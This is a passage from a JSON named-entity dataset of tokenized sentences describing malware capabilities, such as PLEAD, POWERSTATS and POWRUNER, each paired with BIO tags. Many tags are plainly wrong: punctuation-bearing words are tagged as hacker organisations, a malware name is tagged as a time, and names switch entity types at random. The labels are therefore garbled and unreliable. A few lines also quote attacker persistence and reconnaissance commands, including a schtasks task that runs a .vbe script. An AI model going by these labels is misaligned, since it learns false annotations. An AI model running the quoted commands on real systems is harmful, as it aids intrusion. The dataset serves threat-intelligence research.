"O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "P.A.S.", "Webshell", "has", "the", "ability", "to", "copy", "files", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "P.A.S.", "Webshell", "can", "use", "a", "decryption", "mechanism", "to", "process", "a", "user", "supplied", "password", "and", "allow", "execution." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "P.A.S.", "Webshell", "can", "delete", "scripts", "from", "a", "subdirectory", "of", "/tmp", "after", "they", "are", "run." ], "ner_tags": [ "B-Way", "B-Tool", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "P.A.S.", "Webshell", "has", "the", "ability", "to", "list", "files", "and", "file", "characteristics", "including", "extension,", "size,", "ownership,", "and", "permissions." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "P.A.S.", "Webshell", "can", "upload", "and", "download", "files", "to", "and", "from", "compromised", "hosts." ], "ner_tags": [ "B-Way", "B-Tool", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "P.A.S.", "Webshell", "has", "the", "ability", "to", "modify", "file", "permissions." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "P.A.S.", "Webshell", "can", "display", "the", "/etc/passwd", "file", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "P.A.S.", "Webshell", "can", "scan", "networks", "for", "open", "ports", "and", "listening", "services." ], "ner_tags": [ "B-Way", "B-Tool", "O", "I-Features", "I-Features", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "P.A.S.", "Webshell", "can", "use", "encryption", "and", "base64", "encoding", "to", "hide", "strings", "and", "to", "enforce", "access", "control", "once", "deployed." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "P.A.S.", "Webshell", "can", "use", "predefined", "users", "and", "passwords", "to", "execute", "brute", "force", "attacks", "against", "SSH,", "FTP,", "POP3,", "MySQL,", "MSSQL,", "and", "PostgreSQL", "services." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "B-Way", "B-Idus", "B-Way", "B-Way", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "P.A.S.", "Webshell", "can", "list", "PHP", "server", "configuration", "details." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "P.A.S.", "Webshell", "can", "issue", "commands", "via", "HTTP", "POST." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "P.A.S.", "Webshell", "can", "gain", "remote", "access", "and", "execution", "on", "target", "web", "servers." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "B-Purp", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "P2P", "ZeuS", "added", "junk", "data", "to", "outgoing", "UDP", "packets", "to", "peer", "implants." ], "ner_tags": [ "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "P8RAT", "can", "download", "additional", "payloads", "to", "a", "target", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "P8RAT", "can", "send", "randomly-generated", "data", "as", "part", "of", "its", "C2", "communication." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "P8RAT", "can", "check", "for", "specific", "processes", "associated", "with", "virtual", "environments." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "P8RAT", "can", "check", "the", "compromised", "host", "for", "processes", "associated", "with", "VMware", "or", "VirtualBox", "environments." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "P8RAT", "has", "the", "ability", "to", "\"sleep\"", "for", "a", "specified", "time", "to", "evade", "detection." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PACEMAKER", "can", "enter", "a", "loop", "to", "read", "`/proc/`", "entries", "every", "2", "seconds", "in", "order", "to", "read", "a", "target", "application's", "memory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PACEMAKER", "can", "parse", "`/proc/\"process_name\"/cmdline`", "to", "look", "for", "the", "string", "`dswsd`", "within", "the", "command", "line." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PACEMAKER", "has", "written", "extracted", "data", "to", "`tmp/dsserver-check.statementcounters`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "PACEMAKER", "has", "the", "ability", "to", "extract", "credentials", "from", "OS", "memory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "PACEMAKER", "can", "use", "PTRACE", "to", "attach", "to", "a", "targeted", "process", "to", "read", "process", "memory." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PACEMAKER", "can", "use", "a", "simple", "bash", "script", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Way", "O", "O" ] }, { "tokens": [ "PHOREAL", "is", "capable", "of", "manipulating", "the", "Registry." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "PHOREAL", "communicates", "via", "ICMP", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "PHOREAL", "is", "capable", "of", "creating", "reverse", "shell." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "PITSTOP", "has", "the", "ability", "to", "communicate", "over", "TLS." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "PITSTOP", "can", "deobfuscate", "base64", "encoded", "and", "AES", "encrypted", "commands." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PITSTOP", "can", "listen", "over", "the", "Unix", "domain", "socket", "located", "at", "`/data/runtime/cockpit/wd.fd`." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PITSTOP", "can", "listen", "and", "evaluate", "incoming", "commands", "on", "the", "domain", "socket,", "created", "by", "PITHOOK", "malware,", "located", "at", "`/data/runtime/cockpit/wd.fd`", "for", "a", "predefined", "magic", "byte", "sequence.", "PITSTOP", "can", "then", "duplicate", "the", "socket", "for", "further", "communication", "over", "TLS." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PITSTOP", "has", "the", "ability", "to", "receive", "shell", "commands", "over", "a", "Unix", "domain", "socket." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "An", "older", "variant", "of", "PLAINTEE", "performs", "UAC", "bypass." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "PLAINTEE", "has", "downloaded", "and", "executed", "additional", "plugins." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PLAINTEE", "uses", "<code>reg", "add</code>", "to", "add", "a", "Registry", "Run", "key", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PLAINTEE", "performs", "the", "<code>tasklist</code>", "command", "to", "list", "running", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PLAINTEE", "gains", "persistence", "by", "adding", "the", "Registry", "key", "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "PLAINTEE", "encodes", "C2", "beacons", "using", "XOR." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "PLAINTEE", "collects", "general", "system", "enumeration", "data", "about", "the", "infected", "machine", "and", "checks", "the", "OS", "version." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PLAINTEE", "uses", "the", "<code>ipconfig", "/all</code>", "command", "to", "gather", "the", "victim’s", "IP", "address." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "PLAINTEE", "uses", "cmd.exe", "to", "execute", "commands", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PLEAD", "has", "the", "ability", "to", "list", "open", "windows", "on", "the", "compromised", "host." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "I-Features", "I-Features", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "PLEAD", "has", "the", "ability", "to", "steal", "saved", "passwords", "from", "Microsoft", "Outlook." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "B-Purp", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PLEAD", "can", "harvest", "saved", "credentials", "from", "browsers", "such", "as", "Google", "Chrome,", "Microsoft", "Internet", "Explorer,", "and", "Mozilla", "Firefox." ], "ner_tags": [ "B-Org", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "I-Tool", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "PLEAD", "has", "the", "ability", "to", "delete", "files", "on", "the", "compromised", "host." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PLEAD", "has", "the", "ability", "to", "list", "drives", "and", "files", "on", "the", "compromised", "host." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PLEAD", "has", "the", "ability", "to", "upload", "and", "download", "files", "to", "and", "from", "an", "infected", "host." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PLEAD", "samples", "were", "found", "to", "be", "highly", "obfuscated", "with", "junk", "code." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PLEAD", "has", "been", "executed", "via", "malicious", "e-mail", "attachments." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "PLEAD", "has", "been", "executed", "via", "malicious", "links", "in", "e-mails." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "PLEAD", "can", "use", "`ShellExecute`", "to", "execute", "applications." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PLEAD", "has", "the", "ability", "to", "list", "processes", "on", "the", "compromised", "host." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "PLEAD", "has", "the", "ability", "to", "proxy", "network", "communications." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "PLEAD", "has", "used", "RC4", "encryption", "to", "download", "modules." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PLEAD", "has", "used", "HTTP", "for", "communications", "with", "command", "and", "control", "(C2)", "servers." ], "ner_tags": [ "B-Org", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PLEAD", "has", "the", "ability", "to", "execute", "shell", "commands", "on", "the", "compromised", "host." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "POORAIM", "has", "used", "AOL", "Instant", "Messenger", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POORAIM", "has", "been", "delivered", "through", "compromised", "sites", "acting", "as", "watering", "holes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "POORAIM", "can", "conduct", "file", "browsing." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "POORAIM", "can", "enumerate", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "POORAIM", "can", "perform", "screen", "capturing." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "POORAIM", "can", "identify", "system", "information,", "including", "battery", "status." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "POSHSPY", "encrypts", "C2", "traffic", "with", "AES", "and", "RSA." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "POSHSPY", "uploads", "data", "in", "2048-byte", "chunks." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "POSHSPY", "uses", "a", "DGA", "to", "derive", "command", "and", "control", "URLs", "from", "a", "word", "list." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POSHSPY", "downloads", "and", "executes", "additional", "PowerShell", "code", "and", "Windows", "binaries." ], "ner_tags": [ "B-Way", "B-Features", "O", "B-Features", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POSHSPY", "appends", "a", "file", "signature", "header", "(randomly", "selected", "from", "six", "file", "types)", "to", "encrypted", "data", "prior", "to", "upload", "or", "download." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POSHSPY", "uses", "PowerShell", "to", "execute", "various", "commands,", "one", "to", "execute", "its", "payload." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POSHSPY", "modifies", "timestamps", "of", "all", "downloaded", "executables", "to", "match", "a", "randomly", "selected", "file", "created", "prior", "to", "2013." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time" ] }, { "tokens": [ "POSHSPY", "uses", "a", "WMI", "event", "subscription", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "POWERSOURCE", "uses", "DNS", "TXT", "records", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "POWERSOURCE", "has", "been", "observed", "being", "used", "to", "download", "TEXTMATE", "and", "the", "Cobalt", "Strike", "Beacon", "payload", "onto", "victims." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "B-HackOrg", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "If", "the", "victim", "is", "using", "PowerShell", "3.0", "or", "later,", "POWERSOURCE", "writes", "its", "decoded", "payload", "to", "an", "alternate", "data", "stream", "(ADS)", "named", "kernel32.dll", "that", "is", "saved", "in", "<code>%PROGRAMDATA%\\Windows\\</code>." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "POWERSOURCE", "is", "a", "PowerShell", "backdoor." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "POWERSOURCE", "queries", "Registry", "keys", "in", "preparation", "for", "setting", "Run", "keys", "to", "achieve", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSOURCE", "achieves", "persistence", "by", "setting", "a", "Registry", "Run", "key,", "with", "the", "path", "depending", "on", "whether", "the", "victim", "account", "has", "user", "or", "administrator", "access." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "has", "encrypted", "C2", "traffic", "with", "RSA." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "POWERSTATS", "has", "used", "useless", "code", "blocks", "to", "counter", "analysis." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "uses", "character", "replacement,", "PowerShell", "environment", "variables,", "and", "XOR", "encoding", "to", "obfuscate", "code.", "POWERSTATS's", "backdoor", "code", "is", "a", "multi-layer", "obfuscated,", "encoded,", "and", "compressed", "blob.", "POWERSTATS", "has", "used", "PowerShell", "code", "with", "custom", "string", "obfuscation" ], "ner_tags": [ "B-Way", "O", "I-Features", "O", "B-Way", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "can", "use", "DCOM", "(targeting", "the", "127.0.0.1", "loopback", "address)", "to", "execute", "additional", "payloads", "on", "compromised", "hosts." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "can", "upload", "files", "from", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "can", "deobfuscate", "the", "main", "backdoor", "code." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "can", "disable", "Microsoft", "Office", "Protected", "View", "by", "changing", "Registry", "keys." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "POWERSTATS", "can", "use", "DDE", "to", "execute", "additional", "payloads", "on", "compromised", "hosts." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "has", "connected", "to", "C2", "servers", "through", "proxies." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "can", "delete", "all", "files", "on", "the", "C:\\,", "D:\\,", "E:\\", "and,", "F:\\", "drives", "using", "PowerShell", "Remove-Item", "commands." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "POWERSTATS", "can", "retrieve", "and", "execute", "additional", "PowerShell", "payloads", "from", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "can", "use", "JavaScript", "code", "for", "execution." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "POWERSTATS", "can", "retrieve", "usernames", "from", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "has", "created", "a", "scheduled", "task", "named", "\"MicrosoftEdge\"", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "can", "use", "Mshta.exe", "to", "execute", "additional", "payloads", "on", "compromised", "hosts." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "uses", "PowerShell", "for", "obfuscation", "and", "execution." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "has", "used", "<code>get_tasklist</code>", "to", "discover", "processes", "on", "the", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "has", "established", "persistence", "through", "a", "scheduled", "task", "using", "the", "command", "<code>”C:\\Windows\\system32\\schtasks.exe”", "/Create", "/F", "/SC", "DAILY", "/ST", "12:00", "/TN", "MicrosoftEdge", "/TR", "“c:\\Windows\\system32\\wscript.exe", "C:\\Windows\\temp\\Windows.vbe”</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "can", "sleep", "for", "a", "given", "number", "of", "seconds." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "can", "retrieve", "screenshots", "from", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "has", "detected", "security", "tools." ], "ner_tags": [ "B-Time", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "encoded", "C2", "traffic", "with", "base64." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "can", "retrieve", "OS", "name/architecture", "and", "computer/domain", "name", "information", "from", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "can", "retrieve", "IP,", "network", "adapter", "configuration", "information,", "and", "domain", "from", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "O", "I-Features", "B-HackOrg", "I-Features", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "has", "the", "ability", "to", "identify", "the", "username", "on", "the", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "can", "use", "VBScript", "(VBE)", "code", "for", "execution." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Way", "O", "O", "O" ] }, { "tokens": [ "POWERSTATS", "can", "use", "WMI", "queries", "to", "retrieve", "data", "from", "compromised", "hosts." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERTON", "is", "written", "in", "PowerShell." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "POWERTON", "can", "install", "a", "Registry", "Run", "key", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "B-OffAct", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWERTON", "has", "the", "ability", "to", "dump", "password", "hashes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "POWERTON", "has", "used", "AES", "for", "encrypting", "C2", "traffic." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "POWERTON", "has", "used", "HTTP/HTTPS", "for", "C2", "traffic." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "POWERTON", "can", "use", "WMI", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "POWRUNER", "can", "use", "DNS", "for", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "may", "collect", "user", "account", "information", "by", "running", "<code>net", "user", "/domain</code>", "or", "a", "series", "of", "other", "commands", "on", "a", "victim." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "may", "collect", "domain", "group", "information", "by", "running", "<code>net", "group", "/domain</code>", "or", "a", "series", "of", "other", "commands", "on", "a", "victim." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "may", "enumerate", "user", "directories", "on", "a", "victim." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "can", "download", "or", "upload", "files", "from", "its", "C2", "server." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "may", "collect", "local", "group", "information", "by", "running", "<code>net", "localgroup", "administrators</code>", "or", "a", "series", "of", "other", "commands", "on", "a", "victim." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "is", "written", "in", "PowerShell." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "may", "collect", "process", "information", "by", "running", "<code>tasklist</code>", "on", "a", "victim." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "may", "query", "the", "Registry", "by", "running", "<code>reg", "query</code>", "on", "a", "victim." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "persists", "through", "a", "scheduled", "task", "that", "executes", "it", "every", "minute." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "can", "capture", "a", "screenshot", "from", "a", "victim." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "may", "collect", "information", "on", "the", "victim's", "anti-virus", "software." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "can", "use", "base64", "encoded", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "may", "collect", "information", "about", "the", "system", "by", "running", "<code>hostname</code>", "and", "<code>systeminfo</code>", "on", "a", "victim." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "may", "collect", "network", "configuration", "data", "by", "running", "<code>ipconfig", "/all</code>", "on", "a", "victim." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "may", "collect", "active", "network", "connections", "by", "running", "<code>netstat", "-an</code>", "on", "a", "victim." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "may", "collect", "information", "about", "the", "currently", "logged", "in", "user", "by", "running", "<code>whoami</code>", "on", "a", "victim." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "POWRUNER", "can", "use", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", 